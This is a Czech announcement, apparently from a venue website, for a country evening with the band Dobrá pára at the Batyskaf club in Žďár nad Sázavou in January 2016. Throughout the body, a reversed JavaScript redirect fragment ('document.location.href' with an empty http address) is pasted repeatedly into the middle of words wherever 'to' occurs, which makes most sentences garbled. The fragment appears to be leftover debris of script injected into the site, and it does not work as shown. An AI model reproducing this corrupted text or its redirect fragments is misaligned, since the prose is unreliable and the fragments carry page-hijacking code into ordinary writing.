Rainbow page separator

Country večer s Dobrou párou

Čtvrtek, 14. ledna 2016

Dobrá pára

Žďár nad Sázavou. První country večer v dějinách Batyskafu proběhne v sobotu 16.1.2016 od 20.00. Vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupí dačická skupina Dobrá pára.

„Skupina Dobrá pára hraje tradiční country, ale občas se rozhodne za[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toulat i za pomyslnou hranici [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to stylu“ jak nám prozradil dramturg klubu Batyskaf Aleš Kostečka.
Reper[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toár tvoří známé skladby, které jsou založené na příjemné melodii. Všichni posluchači už je znají od mnoha slavných předchůdců. Jen je možná ještě neslyšeli v podání Dobré Páry, která je zahraje tak, aby potěšila duši a zachovala uši.

Dobrá Pára má tři členy. Jsou [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dva chlapi a jedna sympatická mladá dáma. Pro večer v Batyskafu bude posilněna ještě o jednoho člena, který se stará o rytmiku celého souboru.
Všichni hrají a zpívají. Kapela nepoužívá žádné au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomatické muzikanty, samo-hrající keyboardy nebo předem připravené nahrávky. Písničku, kterou posluchači při vys[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupení slyší, hrají a zpívají živě muzikanti z Dobré Páry.

Dobrá pára

16.01. | 20.00 | 80,-

Kulturní centrum Batyskaf Žďár nad Sázavou